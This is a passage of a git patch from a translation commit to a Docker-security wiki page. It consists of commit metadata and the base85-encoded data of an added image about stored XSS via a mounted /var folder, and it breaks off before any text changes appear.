From ec9ee514ab1341bd427bd8631207d8fd1f4d13b8 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 22 Jan 2025 12:09:51 +0000 Subject: [PATCH] Translated ['src/linux-hardening/privilege-escalation/docker-security/do --- .../stored-xss-via-mounted-var-folder.png | Bin 0 -> 53934 bytes .../sensitive-mounts.md | 100 ++++++++++++++++-- 2 files changed, 93 insertions(+), 7 deletions(-) create mode 100644 src/images/stored-xss-via-mounted-var-folder.png diff --git a/src/images/stored-xss-via-mounted-var-folder.png b/src/images/stored-xss-via-mounted-var-folder.png new file mode 100644 index 0000000000000000000000000000000000000000..85971746dcc44a6f250b1d72fc953f06934a56ee GIT binary patch literal 53934 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 